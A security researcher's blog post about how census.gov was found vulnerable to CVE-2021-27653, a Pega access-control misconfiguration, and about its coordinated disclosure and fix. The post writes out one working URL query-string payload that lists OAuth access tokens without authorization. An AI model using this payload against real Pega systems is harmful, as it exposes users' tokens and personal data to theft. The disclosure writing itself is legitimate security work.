Census Vulnerability Exposes 10k OAuth Tokens, Thousands of User Records

Sakura Samurai was able to identify a vulnerability in the census.gov web application that resulted in the exposure of 10,000 OAuth tokens, full user ID names, full names of the users, email addresses, database names and tables, and local application privileged group role names with associated emails. The vulnerability was a result of CVE-2021-27653, a native misconfiguration of Pega Chat Access Group portal in Pega platform 7.4.0 – 8.5.x which leads to unintended data exposure. CVE-2021-27653 was identified by Sakura Samurai in early 2021, and utilized on Ford’s Vulnerability Disclosure Program

Robert Willis initially discovered the vulnerable service on Census while utilizing Google Search operators to identify potentially misconfigured systems on government assets.

Willis observed that ask.census.gov was utilizing Pega Systems, indicated by the /prweb/PRServlet/ path in the URL. Many Government organizations and Corporate Enterprises have been noted as using misconfigured Pega instances. Willis observed that Census had a vulnerability disclosure program offered through the Department of Commerce.

At this point, it was apparent that the web application could possibly be vulnerable to CVE-2021-27653, so Willis moved into the exploitation phase of the assessment.

Willis manually tested the application to avoid production impact. Crafting manual payloads for exploitation was the best route forward. First, the application was navigated to. In order to successfully exploit the vulnerability, a user has to first access the application and ensure that they see /prweb/ in the path of the URL to get assigned a session token. A payload link can not be used until a session token is assigned. This was accomplished by navigating to the following URL:


As seen in the URL the primary portion that will be used for crafting payloads is ‘/prweb/PRServletCustom/app/ECORRAsk/YACFBFye-rFIz_FoGtyvDRUGg1Uzu5Mn*/!STANDARD’

After accessing the application and observing the path, payloads were crafted to bypass application authorization requirements.

First, by appending ‘?pyActivity=Rule-Obj-ListView.ShowView&pyViewPageName=LISTVIEW_LookUpList&ViewPurpose=LookUpList&ViewOwner=ALL&ViewClass=Data-Admin-Security-OAuth2-AccessToken’ to the base URL, the ability to access 10,000 seperate user OAuth tokens was possible.

Next, a payload was crafted that provided the ability to see the full name, user ID, and email address, access group, and even the job title for some of the users:


A payload was then created to access and view Data Admin Security Authentication Profiles:


Finally, internal account groups were enumerated. The following payload allowed for viewing the email, group name, and account type associated with the application:

Validation and Disclosure

Willis then asked John Jackson to assist in re-validating the Census vulnerability. Subsequently, Jackson managed to get in touch with Census for vulnerability patching before disclosure.

Robert Willis contacted the Department of Commerce (DOC) to inquire if Census was within scope of their published VDP. While waiting on a response, we decided to figure out alternative routes of contacting Census. John Jackson then got in touch with Census directly thanks to Synack and the vulnerability was quickly analyzed and resolved within hours of communication. Census took the disclosure seriously and operated with the highest respect to the potential criticality of exposure.

Impact & Remediation
Organizations with Pega deployed in their environment should audit relevant harnesses to ensure that access control vulnerabilities are prevented. Pega released a quick guide for checking to see if their application is vulnerable to CVE-2021-27653:

Pega Security Advisory with Remediation Guidelines

Robert Willis
John Jackson

By Robert Willis (rej_ex)

I'm an infosec, cybersecurity professional who enjoys continuously learning and hacking. I also collect and make comics books. I role with my crew -- Sakura Samurai. Follow me on Twitter @rej_ex.

Leave a comment

Your email address will not be published. Required fields are marked *